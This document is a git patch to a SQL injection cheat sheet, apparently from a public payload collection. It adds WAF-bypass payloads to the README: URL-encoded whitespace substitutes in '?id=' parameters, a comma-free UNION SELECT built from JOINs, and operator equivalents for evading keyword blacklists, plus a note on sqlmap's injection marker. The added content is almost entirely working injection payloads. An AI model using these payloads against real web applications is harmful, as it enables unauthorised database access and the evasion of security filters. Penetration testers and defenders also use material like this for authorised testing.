From a39a10f175ccb7f66490db5ea3044379f31ebd22 Mon Sep 17 00:00:00 2001
From: swisskyrepo
Date: Sun, 4 Dec 2016 20:26:42 +0700
Subject: [PATCH] SQL injection - added some bypass

---
 SQL injection/README.md | 19 ++++++++++++++++---
 1 file changed, 16 insertions(+), 3 deletions(-)

diff --git a/SQL injection/README.md b/SQL injection/README.md
index 11bae55..6a9241e 100644
--- a/SQL injection/README.md
+++ b/SQL injection/README.md
@@ -33,6 +33,7 @@ sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --risk=3 --lev
 Custom injection in UserAgent/Header/Referer/Cookie
 ```
 python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*"
+The injection is located at the '*'
 ```
 
 General tamper option and tamper's list
@@ -176,6 +177,16 @@ SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
 
 ## WAF Bypass
 
+No Space (%20) - bypass using whitespace alternatives
+```
+?id=1%09and%091=1%09--
+?id=1%0Dand%0D1=1%0D--
+?id=1%0Cand%0C1=1%0C--
+?id=1%0Band%0B1=1%0B--
+?id=1%0Aand%0A1=1%0A--
+?id=1%A0and%A01=1%A0--
+```
+
 No Whitespace - bypass using comments
 ```
 ?id=1/*comment*/and/**/1=1/**/--
@@ -186,10 +197,11 @@ No Whitespace - bypass using parenthesis
 ?id=(1)and(1)=(1)--
 ```
 
-No Comma - bypass using OFFSET and FROM
+No Comma - bypass using OFFSET, FROM and JOIN
 ```
-LIMIT 0,1 -> LIMIT 1 OFFSET 0
+LIMIT 0,1 -> LIMIT 1 OFFSET 0
 SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
+SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
 ```
 
 Blacklist using keywords - bypass using uppercase/lowercase
@@ -199,11 +211,12 @@ Blacklist using keywords - bypass using uppercase/lowercase
 ?id=1 aNd 1=1#
 ```
 
-Blacklist using keywords case insensitive - bypass using equivalent
+Blacklist using keywords case insensitive - bypass using an equivalent operator
 ```
 AND -> &&
 OR -> ||
 = -> LIKE,REGEXP, not < and not >
+> X -> not between 0 and X
 WHERE -> HAVING
 ```